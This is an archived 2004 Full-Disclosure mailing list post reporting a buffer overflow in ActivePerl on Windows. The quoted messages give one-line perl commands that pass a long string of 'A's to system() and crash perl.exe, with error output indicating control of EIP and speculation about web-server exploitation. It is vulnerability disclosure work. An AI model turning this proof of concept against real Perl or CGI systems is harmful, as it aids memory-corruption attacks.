|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-Disclosure] Re: Buffer Overflow in ActivePerl ?
From: npguy (npguy
websurfer.com.np)
Date: Tue May 18 2004 - 09:45:46 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
perl, v5.8.2 MSWin32-x86-multi-thread suffer the same.
Tuesday, May 18, 2004, 7:14:41 PM, you wrote:
NF> "Olivergreyhat.de" <Olivergreyhat.de> wrote:
>> i played around with ActiveState's ActivePerl for Win32, and crashed
>> Perl.exe with the following command:
>>
>> perl -e "$a="A" x 256; system($a)"
NF> Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
NF> all but last week's security patch:
NF> perl -e "$a="A" x 256; system($a)"
NF> perl.exe - Application error
NF> Unhandled instruction at "0x77fcc83d" referenced memory at
NF> "0x00657865. The memory could not be "written".
NF> Also, it is likely exploitable -- push up the number of A's a bit:
NF> C:\>perl -e "$a="A" x 259; system($a)"
NF> perl.exe - Application error
NF> Unhandled instruction at "0x77fcc83d" referenced memory at
NF> "0x65004141. The memory could not be "written".
NF> and we seem to get control of EIP. Coincidence? Try yet two more:
NF> C:\>perl -e "$a="A" x 261; system($a)"
NF> perl.exe - Application error
NF> Unhandled instruction at "0x77fcc83d" referenced memory at
NF> "0x41414141. The memory could not be "written".
NF> Looks like full control of EIP...
NF> However, there is not likely to be a privilege escalation here unless
NF> perhaps a script processor on a web server can be cajoled into doing
NF> something with this?? (Not at all familiar with the innards of Windows
NF> web servers and their relationship to their CGI, etc processors...)
npguy npguy€websurfer.com.np
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]